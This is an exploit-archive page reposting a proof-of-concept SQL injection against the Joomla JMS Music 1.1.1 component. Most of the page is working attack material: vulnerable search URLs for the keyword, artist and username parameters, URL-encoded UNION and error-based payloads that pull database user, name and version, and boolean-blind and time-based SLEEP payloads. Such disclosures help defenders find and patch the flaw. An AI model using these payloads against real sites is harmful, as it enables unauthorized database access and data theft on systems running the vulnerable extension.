Advertisement






Joomla! JMS Music 1.1.1 SQL Injection

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
ExploitAlert team High Remote 2018-02-03
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018020026

Below is a copy:

Joomla! JMS Music 1.1.1 SQL Injection
# # # # #
# Exploit Title: Joomla! Component JMS Music 1.1.1 - SQL Injection
# Dork: N/A
# Date: 01.02.2018
# Vendor Homepage: https://www.joommasters.com/
# Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/jms-music/
# Version: 1.1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_jmsmusic&view=search&keyword=[SQL]
# 
# %45%66%65%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%56%65%72%41%79%61%72%69
#  
# Parameter: keyword (GET)
#     Type: boolean-based blind
#     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
#     Payload: option=com_jmsmusic&view=search&keyword=-5694' OR 3737=3737#
# 
#     Type: error-based
#     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
#     Payload: option=com_jmsmusic&view=search&keyword=Efe' AND (SELECT 5924 FROM(SELECT COUNT(*),CONCAT(0x7178787671,(SELECT (ELT(5924=5924,1))),0x716b626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- BeNf
# 
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 OR time-based blind
#     Payload: option=com_jmsmusic&view=search&keyword=Efe' OR SLEEP(5)-- EoWI
# 
# 2)
# http://localhost/[PATH]/index.php?option=com_jmsmusic&view=search&artist=[SQL]
# 
# %27%20%20%2f%2a%21%30%32%32%32%32%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%32%32%32%32%53%45%4c%45%43%54%2a%2f%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2d%2d%20%2d
# 
# Parameter: artist (GET)
#     Type: error-based
#     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
#     Payload: option=com_jmsmusic&view=search&artist=Efe'||(SELECT 'ziQV' FROM DUAL WHERE 5411=5411 AND (SELECT 5581 FROM(SELECT COUNT(*),CONCAT(0x7170767171,(SELECT (ELT(5581=5581,1))),0x7170706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'
# 
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: option=com_jmsmusic&view=search&artist=Efe'||(SELECT 'xwge' FROM DUAL WHERE 8319=8319 AND SLEEP(5))||'
# 
# 3)
# http://localhost/[PATH]/index.php?option=com_jmsmusic&view=search&username=[SQL]
# 
# %45%66%65%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%56%65%72%41%79%61%72%69
# 
# Parameter: username (GET)
#     Type: boolean-based blind
#     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
#     Payload: option=com_jmsmusic&view=search&username=-1653' OR 6007=6007#
# 
#     Type: error-based
#     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
#     Payload: option=com_jmsmusic&view=search&username=Efe' AND (SELECT 8019 FROM(SELECT COUNT(*),CONCAT(0x7171766b71,(SELECT (ELT(8019=8019,1))),0x7171767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- rMej
# 
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 OR time-based blind
#     Payload: option=com_jmsmusic&view=search&username=Efe' OR SLEEP(5)-- rhvR
# 
# # # # #

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum